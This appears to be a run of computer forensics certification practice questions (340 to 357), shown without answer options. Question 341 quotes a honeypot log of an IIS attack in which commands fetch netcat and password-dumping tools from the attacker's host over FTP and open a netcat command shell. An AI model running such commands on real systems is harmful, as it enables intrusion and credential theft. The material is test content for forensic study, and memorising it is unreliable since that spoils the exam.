QUESTION 340
What file is processed at the end of a Windows XP boot to initialize the logon dialog box?

QUESTION 341
The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.
He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below.
“cmd1.exe /c open 213.116.251.162 >ftpcom”
“cmd1.exe /c echo johna2k >>ftpcom”
“cmd1.exe /c echo haxedj00 >>ftpcom”
“cmd1.exe /c echo get nc.exe >>ftpcom”
“cmd1.exe /c echo get pdump.exe >>ftpcom”
“cmd1.exe /c echo get samdump.dll >>ftpcom”
“cmd1.exe /c echo quit >>ftpcom”
“cmd1.exe /c ftp -s:ftpcom”
“cmd1.exe /c nc -l -p 6969 -e cmd1.exe”
What can you infer from the exploit given?

QUESTION 342
Office documents (Word, Excel, PowerPoint) contain a code that allows tracking the MAC, or unique identifier, of the machine that created the document. What is that code called?

QUESTION 343
All Blackberry email is eventually sent and received through what proprietary RIM-operated mechanism?

QUESTION 344
Which of the following commands shows you all of the network services running on Windows-based servers?

QUESTION 345
Which cloud model allows an investigator to acquire the instance of a virtual machine and initiate the forensics examination process?

QUESTION 346
An “idle” system is also referred to as what?

QUESTION 347
Which of the following web browser uses the Extensible Storage Engine (ESE) database format to store browsing records, including history, cache, and cookies?

QUESTION 348
What is the name of the first reserved sector in File allocation table?

QUESTION 349
When obtaining a warrant, it is important to:

QUESTION 350
Why are Linux/Unix based computers better to use than Windows computers for idle scanning?

QUESTION 351
Which of these Windows utility help you to repair logical file system errors?

QUESTION 352
Which of the following stages in a Linux boot process involve initialization of the system’s hardware?

QUESTION 353
What encryption technology is used on Blackberry devices Password Keeper?

QUESTION 354
Cylie is investigating a network breach at a state organization in Florid a. She discovers that the intruders were able to gain access into the company firewalls by overloading them with IP packets. Cylie then discovers through her investigation that the intruders hacked into the company phone system and used the hard drives on their PBX system to store shared music files. What would this attack on the company PBX system be called?

QUESTION 355
What is kept in the following directory? HKLMSECURITYPolicySecrets

QUESTION 356
If an attacker’s computer sends an IPID of 31400 to a zombie computer on an open port in IDLE scanning, what will be the response?

QUESTION 357
Chris has been called upon to investigate a hacking incident reported by one of his clients. The company suspects the involvement of an insider accomplice in the attack. Upon reaching the incident scene, Chris secures the physical area, records the scene using visual medi a. He shuts the system down by pulling the power plug so that he does not disturb the system in any way. He labels all cables and connectors prior to disconnecting any. What do you think would be the next sequence of events?